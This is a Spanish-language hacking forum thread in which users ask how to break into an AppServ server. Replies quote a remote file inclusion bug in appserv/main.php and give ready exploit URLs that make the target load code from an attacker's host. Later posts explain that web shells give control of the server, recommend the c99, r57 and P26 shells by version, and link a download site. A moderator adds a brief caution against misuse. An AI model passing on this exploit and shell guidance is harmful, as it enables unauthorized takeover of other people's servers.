Como entrar via appserv [explotar vulneravilidades en appserv]

[Sidius]

bueno les cuento quisiera saver como entrar a un server en realidad es un pc ke es usado como server el se ke hay unas formas de entrar atraves del appserv pero nose como  pregunte a algunos conocidos y me dijeron ke posteara jeje
bueno si alguien me da algunas info Gracias
encontre algunas info nose si serviran o mas que nada no se como usarlas
======================================================================

[ The bug ]

This in the directory appserv, file main.php:

======================================================================

include("$appserv_root/lang-english.php");

And another inclusion ( include("$appserv_root/lang-thai.php"); ), but with the same variable

======================================================================

[ Exploit ]

http://[target]/appserv/main.php?appserv_root=http://[attacker]/

======================================================================

[OzX]

mmm mira como es include() hace referencia a un RFI, remote file inclucion.

[ el bug ]
El directorio vulnerable es , main.php
===========================================================
include("$appserv_root/lang-english.php");
y otra inclucion ( include("$appserv_root/lang-thai.php"); ) pero con la misma varible.

=============================================================
exploit

http://[sitioweb]//appserv/main.php?appserv_root=http://shell

XD¡

si veo esta web
Para ver este enlace Registrate o Inicia Sesion es bajada o cambiad ale aviso al admin, no sean lammer y aprende para saber como funcionan las cosas, no para joder a quien tiene un server de un juego.

ayudo a personas que kieran aprender no a lamercillos que kierne joder a alguien a quien le tienen envidia.

grax
adios.

mod OzX

[Sidius]

el server es mio ¬¬ =( kiero aprender de eso  pero no para joder ..... ¬¬

[OzX]

jwjawjwa XD¡ bueno esta esta bien.

od: lo digo porque muchos llegan diciendo mensajes subliminales.. de kieren que le hackeen cierta pag de juegos..

[Sidius]

podrias explicarme eso plz y lo de la shell buske en el foro pero como ke no me keda claro lo de la shell

[OzX]

la shell es un programa pro decirlo asi, que la mayoria esta en php o txt, bueno se les puede cambiar la extencion que uno puede tomar el control del servidor inyectando esa shell, RFI.

ahy buena info en internet sobre el tema si le das el tiempo de buscas SHELL RFI en internet seguro que encontraras...

[Sidius]

Gracias me aclaraste bastante ...

[Kaos007]

que tipo de shell serviria para el appserv??

yo solo tngo la c99 y la r57 pero no se si funcionen esas..

es una humilde pregunta xD!

y me he estado bajando las revistras hackxcrack ya estoy listo para leerlas =D

Adew

[OzX]

no tengo idea habria que provar..
miren por aka
las k salga shell

Para ver este enlace Registrate o Inicia Sesion

http://usuarios.lycos.es/yashirahackersteam/War/

[CiberPunk]

Una shell como las expuestas funciona  a la perfeccion.

Solo a veces no funciona estas shells por que son versiones anteriores  bueno las ultimas versiones hasta ahora son:

C99.TXT --- #16 (version 16)
r57shell.txt --- # 1.3 (verion en beta por RST)
P26shell.txt --- ? pero es la mas recomendad.

Ahora si no funcionan ya es por ke la web esta personalizada y por lo tanto no afecta a la variable vulnerable.

Greetings:::